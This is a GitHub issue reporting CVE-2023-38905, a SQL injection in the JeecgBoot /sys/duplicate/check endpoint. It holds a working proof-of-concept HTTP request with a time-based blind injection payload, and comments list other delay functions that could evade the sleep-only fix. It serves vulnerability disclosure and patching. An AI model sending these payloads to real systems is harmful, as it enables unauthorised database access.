Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[CVE-2023-38905] sys/duplicate/check SQL注入 #4737

Closed
wealeson1 opened this issue Mar 22, 2023 · 4 comments
Closed

[CVE-2023-38905] sys/duplicate/check SQL注入 #4737

wealeson1 opened this issue Mar 22, 2023 · 4 comments

Comments

@wealeson1
Copy link

wealeson1 commented Mar 22, 2023
edited
Loading

版本号:

3.5.0

前端版本:vue3版?还是 vue2版?

vue3版

问题描述:

/sys/duplicate/check 接口SQL注入,checksql可以被绕过。

截图&代码:

延时10秒。
image
不延时。
image
请求包。

GET /jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldName=1+and%09if(user(%20)='root@localhost',sleep(0),sleep(0))&fieldVal=1&dataId=asd HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Connection: close
Cache-Control: max-age=0
X_ACCESS_TOKEN: eyJ0eXAi0iJKV1QiLCJhbGci0iJIUzI1Ni J9.eyJleHAi0jE2NzA2NjUy0TQsInVzZXJ uYW1lIjoiYWRtaW4i fQ.bL0e7k3rbFEewdMoL2YfPCo9rtzx7g9 KLjB2LK-J9SU

友情提示(为了提高issue处理效率):

  • 未按格式要求发帖,会被直接删掉;
  • 描述过于简单或模糊,导致无法处理的,会被直接删掉;
  • 请自己初判问题描述是否清楚,是否方便我们调查处理;
  • 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
@tygithub1
Copy link

tygithub1 commented Apr 10, 2023
edited
Loading

已修改,对sleep作了专门校验

zhangdaiscott added a commit that referenced this issue Apr 13, 2023
@zhangdaiscott
sys/duplicate/check SQL注入 #4737
ca1218f
@healkerzk
Copy link

mysql是sleep,其他数据库可能不一样,如oracle是DECODE、DBMS_PIPE.RECEIVE_MESSAGE

@wealeson1
Copy link
Author

大概整理了下可以造成延时的函数,可以考虑处理下。
BENCHMARK
PG_SLEEP
DBMS_LOCK.SLEEP
WAITFOR
DECODE
DBMS_PIPE.RECEIVE_MESSAGE

@wealeson1 wealeson1 changed the title sys/duplicate/check SQL注入 [CVE-2023-38905] sys/duplicate/check SQL注入 Aug 18, 2023
@zhangdaiscott
Copy link
Member

漏洞修复方案
https://my.oschina.net/jeecg/blog/10107636

@zhangdaiscott zhangdaiscott mentioned this issue Sep 5, 2023
Closed
EightMonth pushed a commit to EightMonth/jeecg-boot that referenced this issue Dec 28, 2023
@zhangdaiscott
sys/duplicate/check SQL注入 jeecgboot#4737
d23f03a
yoko-murasame added a commit to yoko-murasame/jeecg-boot that referenced this issue Apr 23, 2024
@yoko-murasame
sys/duplicate/check SQL注入 jeecgboot#4737
82c674d
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@zhangdaiscott @tygithub1 @healkerzk @wealeson1